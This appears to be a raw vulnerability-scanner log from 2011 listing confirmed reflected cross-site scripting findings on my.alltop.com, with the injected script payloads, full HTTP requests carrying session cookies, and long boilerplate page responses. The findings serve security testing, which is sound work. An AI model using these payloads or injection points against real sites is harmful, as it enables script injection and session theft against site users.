Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:50:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:21 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:21 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:21 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6001
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('pa..
- /img/mugs/

/img/mugs/ CONFIRMED

http://my.alltop.com/img/mugs/?'"--></style></script><script>alert(0x000254)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000254)</script>

Request

GET /img/mugs/?'"--></style></script><script>netsparker(0x000254)</script> HTTP/1.1
Referer: http://my.alltop.com/img/mugs/celeb-mug-adamengst.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Tue, 08 Mar 2011 20:50:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:35 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_45_15656_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:35 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:35 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6004
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from ALLTOP_TOPIC_NAME websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by ALLTOP_TOPIC_NAME </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3> <div class="full-post"> <div class="site-title">Alltop News and Updates</div> <div class="author">GuyKawasaki</div> <div class="published">17 Nov 2010 | 12:33 am</div> <div class="entry-content"> <div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div> </div> </div> </li> </ul> <ul id="feed832086" class="feed-block f8d42cf47d0c0ee7cc5e4760157409d3"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://blog.alltop.com/" target="_blank" class="snap_shots">Alltop News and Updates</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FYTNhMDBC1Y/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 Nov 2010 | 12:33 am</div><div class="entry-content"><div class="entry-bound">Guy Kawasaki has set his first book, The Macintosh Way, free. To get it, all you have to do is “like” the Facebook fan page of his next book, Enchantment: The Art of Changing Hearts, Minds, and Actions. Click on the “Like” button.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/FdstPJkqQ98/want-country-specific-news.html" rel="bookmark" target="_blank">Want country-specific news?</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">15 Nov 2010 | 7:58 am</div><div class="entry-content"><div class="entry-bound">If you’d like country-specific news, please click here. We’ve aggregated news for approximately forty-five countries to make it easy and fast for you.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/hJCdkI9srKA/how-to-get-a-free-copy-of-guykawasakis-first-book-the-macintosh-way.html" rel="bookmark" target="_blank">How to get a free copy of @guykawasaki's first book, The Macintosh Way</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">2 Aug 2010 | 10:23 am</div><div class="entry-content"><div class="entry-bound">Guy has set his first book free. Get it here. He wrote this book in 1987 in order to explain the Macintosh Way of doing the right things the right way.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/eEAs7Gfb4Yk/if-you-have-a-love-of-nature-youll-love-these-sites.html" rel="bookmark" target="_blank">If you have a love of Nature, you'll love these sites:</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:09 pm</div><div class="entry-content"><div class="entry-bound">Check out our latest additions: Nature.alltop and Nature.com.alltop. The former contains the blogs and websites of nature lovers. The latter contains all of the feeds from Nature.com. And don’t forget that we have cover ecology at Green.alltop.</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://feedproxy.google.com/~r/typepad/GuyKawasaki/alltop/~3/Pm9rU7ZCgwY/how-to-stay-on-top-of-immigration-news-and-issues.html" rel="bookmark" target="_blank">How to stay on top of immigration news and issues</a></h3><div class="full-post"><div class="author">GuyKawasaki</div><div class="published">17 May 2010 | 11:23 am</div><div class="entry-content"><div class="entry-bound">People who like to stay on top of immigration news and issues will find Immigration.alltop very useful. We aggregate the best websites and blogs about immigration news there.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('sign-up-form-html').style.display = 'none';
$('sign-up-form-message').style.display = 'block';
$('sign-up-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
function password_change_form_submit() {
var f = $('the-password-change-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-password-change-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('password-change-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
$('password-change-form-html').style.display = 'none';
$('password-change-form-message').style.display = 'block';
$('password-change-form-message').effect('opacity', {
duration: 500,
fps: 75
}).start(1);
}
}).start(0);
}
else {
alert(response);
}
},
onFailure: function(){
}
}).request();
}
var shown_form_id = null;
function show_form(form_el_id) {
var sout = false;
if ($(form_el_id).style.display == 'block') {
sout = true;
}
$('slide-wrapper').style.display='block';
$('log-in').style.display='none';
$('sign-up').style.display='none';
$('password-recovery').style.display='none';
$('password-cha..
- /alisonvandiggelen

/alisonvandiggelen CONFIRMED

http://my.alltop.com/alisonvandiggelen?"></script><script>alert(9)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING "></script><script>alert(9)</script>

Request

GET /alisonvandiggelen?"></script><script>netsparker(9)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
